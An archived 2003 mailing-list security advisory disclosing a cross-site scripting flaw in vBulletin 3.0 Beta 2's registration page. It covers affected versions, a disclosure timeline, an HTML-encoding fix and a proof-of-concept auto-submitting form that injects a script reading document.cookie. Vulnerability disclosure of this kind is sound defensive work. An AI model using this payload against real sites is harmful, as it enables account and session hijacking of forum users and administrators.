[VulnWatch] VBulletin New Member XSS Vulnerability

From: Ferruh Mavituna (ferruh_at_mavituna.com)
Date: 08/08/03

Next message: Mike Caudill: "Re: [VulnWatch] Cisco CSS 11000 Series DoS"

Previous message: _at_stake Advisories: "[VulnWatch] tcpflow 0.2.0 Format String Vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: <vulnwatch@vulnwatch.org>
Date: Fri, 8 Aug 2003 17:53:53 +0300

------------------------------------------------------
VBulletin New Member XSS Vulnerability
------------------------------------------------------
Any kind of XSS attacks possibility. With this vuln. an attacker could
access other users/admins accounts.
Online URL : http://ferruh.mavituna.com/article.asp?256

------------------------------------------------------
About VBulletin;
------------------------------------------------------
PHP Based Popular Forum Application

Vendor & Demo;
www.vbulletin.com

------------------------------------------------------
Description;
------------------------------------------------------
In new member page (register.php), If you skip a required field system
redirect you same form and fill fields automaticly that you enter before for
a better form. In standard fields Vbulletin successfully handle script
injections. But in optional fields like "Interests-Hobbies", "Biography",
"Occupation" etc...

So you can execute any JS with this fields.

------------------------------------------------------
Vulnerable;
------------------------------------------------------
vBulletin 3.0 Beta 2

------------------------------------------------------
Non Vulnerable;
------------------------------------------------------
vBulletin 2.3.0
vBulletin 2.2.8 ...

------------------------------------------------------
Vendor Status;
------------------------------------------------------
No answer at the moment.

------------------------------------------------------
History
------------------------------------------------------
Discovered : 15.07.2003
Vendor Informed : 29.07.2003
Publihed : 06.08.2003

------------------------------------------------------
Solution;
------------------------------------------------------
HTML Encoding like other inputs is OK.

------------------------------------------------------
Exploit Code;
------------------------------------------------------
[form action="http://[victim]/register.php?do=register" method="post"
style="display:none"]
[input type="hidden" name="s" value="" /]
[input type="hidden" name="regtype" value="1" /]
[input type="text" class="bginput" name="field1" value="" size="25"
maxlength="250" /]
[input type="hidden" name="url" value="index.php" /]
[input type="hidden" name="do" value="addmember" /]
[/form]
[script]
//Code that will be executed
var xss = "\"][script]alert(document"+".cookie)[\/script]";
document.forms[0].field1.value=xss;
document.forms[0].submit();
[/script]

*Replace ([],<>)

Ferruh Mavituna
ferruh@mavituna.com
http://ferruh.mavituna.com
Web Application Security Specialist

Next message: Mike Caudill: "Re: [VulnWatch] Cisco CSS 11000 Series DoS"

Previous message: _at_stake Advisories: "[VulnWatch] tcpflow 0.2.0 Format String Vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]